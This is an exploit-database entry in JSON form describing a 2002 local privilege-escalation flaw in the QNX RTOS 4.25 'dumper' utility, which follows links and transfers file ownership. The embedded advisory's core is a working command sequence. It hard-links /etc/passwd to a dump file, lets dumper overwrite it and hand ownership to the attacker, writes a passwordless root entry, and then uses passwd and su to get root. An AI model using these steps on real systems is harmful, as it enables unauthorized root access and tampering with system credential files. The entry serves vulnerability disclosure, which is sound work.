QNX RTOS 4.25 - dumper Arbitrary File Modification

2002-05-31T00:00:00

Description

{"lastseen": "2020-04-01T19:04:44", "references": [], "description": "\nQNX RTOS 4.25 - dumper Arbitrary File Modification", "edition": 1, "reporter": "Simon Ouellette", "exploitpack": {"type": "local", "platform": "linux"}, "published": "2002-05-31T00:00:00", "title": "QNX RTOS 4.25 - dumper Arbitrary File Modification", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.0, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.0}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2002-05-31T00:00:00", "id": "EXPLOITPACK:1D693296FB7891A710026DE54F71398C", "href": "", "viewCount": 5, "sourceData": "source: https://www.securityfocus.com/bid/4904/info\n\nWhen creating memory dump files, the QNX RTOS debugging utility 'dumper' follows symbolic links. It also sets ownership of the file to the userid of the terminated process. It is possible for malicious local attackers to exploit this vulnerability to overwrite and gain ownership of arbitrary files. Consequently, attackers may elevate to root privileges by modifying files such as '/etc/passwd'. \n\nExample exploit, with /bin/dumper:\n\nLet EVIL be the unprivileged user who wants to gain root access.\n\n#link to the passwd file: dumper dumps to [process name].dmp\n$ ln /etc/passwd /home/EVIL/ksh.dmp\n#call the program that will attempt to write to the hard link\n$ dumper -d /home/EVIL -p [PID of EVIL's ksh]\n#have dumper do its job by terminating the monitored process\n$ exit\n#at this point, /etc/passwd is overwritten by the binary dump, and more\nimportantly: EVIL is now the owner !\n$ echo root::0:0::///:/bin/sh > /etc/passwd\n#but now no login works because /etc/passwd is not owned by userid 0. #So\nyou do:\n\n$ passwd\n\n#and change your password. This gives /etc/passwd ownership back to root,\nkeeping the modifications you have made.\n\n$ su\n#", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645470702, "score": 1659814272}, "_internal": {"score_hash": "821a8cec6b242b262fcba8cbcbd1af9c"}}